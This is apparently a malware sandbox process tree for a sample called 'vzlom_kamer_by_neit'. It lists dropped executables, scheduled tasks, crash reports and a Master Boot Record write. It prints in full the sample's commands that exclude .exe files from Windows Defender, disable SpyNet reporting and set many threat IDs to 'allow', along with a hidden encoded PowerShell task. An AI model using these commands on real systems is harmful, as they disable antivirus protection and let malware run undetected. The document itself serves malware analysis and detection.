C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1692 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1704 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1716 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 2012 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1700 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 2012 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1784 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1736 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1996 | tree level 4
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\PxtQF4i0\DMfcPC.exe | C:\Users\Admin\AppData\Local\Temp\PxtQF4i0\DMfcPC.exe /m SUB=72aafdade9cba069152144844a0d25e0 | tree level 4
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-FL8GB.tmp\is-LA33S.tmp | "C:\Users\Admin\AppData\Local\Temp\is-FL8GB.tmp\is-LA33S.tmp" /SL4 $303AC "C:\Users\Admin\AppData\Local\Temp\PxtQF4i0\DMfcPC.exe" 1559217 52736 /m SUB=72aafdade9cba069152144844a0d25e0 | tree level 5
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exe | "C:\Windows\system32\net.exe" helpmsg 20 | tree level 6
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 helpmsg 20 | tree level 7
-
C:\Users\Admin\AppData\Local\Temp\is-P55AP.tmp\FileDate329\FileDate329.exe | "C:\Users\Admin\AppData\Local\Temp\is-P55AP.tmp\FileDate329\FileDate329.exe" /m SUB=72aafdade9cba069152144844a0d25e0 | tree level 6
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c taskkill /im "FileDate329.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\is-P55AP.tmp\FileDate329\FileDate329.exe" & exit | tree level 7
-
C:\Users\Admin\AppData\Local\Temp\Qps2hE9L\71r9O7Y9zIfGXmeBiL.exe | C:\Users\Admin\AppData\Local\Temp\Qps2hE9L\71r9O7Y9zIfGXmeBiL.exe /S /site_id=690689 | tree level 4
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe | "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&" | tree level 5
-
C:\Windows\SysWOW64\cmd.exe | /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64& | tree level 6
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64 | tree level 7
-
\??\c:\windows\SysWOW64\reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 | tree level 7
-
C:\Windows\SysWOW64\forfiles.exe | "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&" | tree level 5
-
C:\Windows\SysWOW64\cmd.exe | /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64& | tree level 6
-
\??\c:\windows\SysWOW64\reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64 | tree level 7
-
\??\c:\windows\SysWOW64\reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32 | tree level 7
-
C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "gOonaGCFB" /SC once /ST 11:24:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" | tree level 5
  (the -EncodedCommand payload is UTF-16LE base64 and decodes to: start-process -WindowStyle Hidden gpupdate.exe /force, which applies the Defender policy keys written above)
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe | schtasks /run /I /tn "gOonaGCFB" | tree level 5
-
C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "gOonaGCFB" | tree level 5
-
C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "bIIVPNBwJtQvPFWhKj" /SC once /ST 21:29:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw\mlDSIyJieHcCVqF\kSdbFaL.exe\" DF /site_id 690689 /S" /V1 /F | tree level 5
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1344 | tree level 4
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\ogFD24AR\9nx2u.exe | C:\Users\Admin\AppData\Local\Temp\ogFD24AR\9nx2u.exe | tree level 4
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-HMJ9I.tmp\is-GRU8E.tmp | "C:\Users\Admin\AppData\Local\Temp\is-HMJ9I.tmp\is-GRU8E.tmp" /SL4 $203F2 "C:\Users\Admin\AppData\Local\Temp\ogFD24AR\9nx2u.exe" 1906126 51712 | tree level 5
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\BKngBackup\SyncBackupShell.exe | "C:\Program Files (x86)\BKngBackup\SyncBackupShell.exe" | tree level 6
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1248 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1656 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1248 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1644 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1936 | tree level 4
- Program crash
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 2004 | tree level 4
- Program crash
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1972 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1644 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1648 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1704 | tree level 4
- Program crash
-
C:\Windows\SysWOW64\net.exe | "C:\Windows\system32\net.exe" pause ImageComparer329 | tree level 3
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 pause ImageComparer329 | tree level 4
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4668 -ip 4668 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4668 -ip 4668 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 4668 -ip 4668 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4668 -ip 4668 | tree level 1
-
C:\Windows\system32\taskmgr.exe | "C:\Windows\system32\taskmgr.exe" /4 | tree level 1
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\System32\rundll32.exe | C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 396 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2144 -ip 2144 | tree level 1
-
C:\Users\Admin\Documents\vzlom_kamer_by_neit.rar_id25861706.exe | "C:\Users\Admin\Documents\vzlom_kamer_by_neit.rar_id25861706.exe" | tree level 1
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\taskkill.exe | taskkill /im "FileDate329.exe" /f | tree level 1
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== | tree level 1
  (this is the scheduled task "gOonaGCFB" firing; the payload decodes to: start-process -WindowStyle Hidden gpupdate.exe /force)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe | "C:\Windows\system32\gpupdate.exe" /force | tree level 2
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\S
ysWOW64\WerFault.exe -pss -s 524 -p 2144 -ip 2144 | tree level 1
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum | tree level 1
-
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc | tree level 1
-
C:\Windows\system32\gpscript.exe | gpscript.exe /RefreshSystemParam | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2144 -ip 2144 | tree level 1
-
C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2144 -ip 2144 | tree level 1
-
C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw\mlDSIyJieHcCVqF\kSdbFaL.exe | C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw\mlDSIyJieHcCVqF\kSdbFaL.exe DF /site_id 690689 /S | tree level 1
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;" | tree level 2
  (ThreatIDDefaultAction data 6 is the Allow action: Defender is told to allow each listed threat ID instead of remediating it, in both the 32-bit and 64-bit registry views)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe | "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32 | tree level 4
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64 | tree level 3
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32 | tree level 3
-
